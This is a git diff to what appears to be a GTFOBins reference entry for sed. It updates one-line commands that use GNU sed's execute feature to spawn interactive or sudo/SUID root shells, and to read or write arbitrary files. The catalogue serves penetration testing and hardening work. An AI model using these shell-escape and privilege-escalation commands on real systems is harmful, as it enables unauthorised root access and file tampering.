diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index dbeb315..c0f2f67 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -1,19 +1,23 @@ --- functions: execute-interactive: - - code: sed "e /bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" + - description: GNU version only. Also, this requires `bash`. + code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + execute-non-interactive: + - description: GNU version only. + code: sed -n "1e id" /etc/hosts sudo-enabled: - - code: sudo sed "e /bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" + - description: GNU version only. Also, this requires `bash`. + code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts suid-enabled: - - code: | - LFILE=file_to_read - ./sed -e '' "$LFILE" + - description: GNU version only. Also, this requires `bash`. + code: ./sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts file-read: - code: | LFILE=file_to_read - sed -e '' "$LFILE" + sed '' "$LFILE" file-write: - code: | LFILE=file_to_write - echo x | sed "s/x/data/;w $LFILE" + sed -n "1s/.*/data/w $LFILE" /etc/hosts ---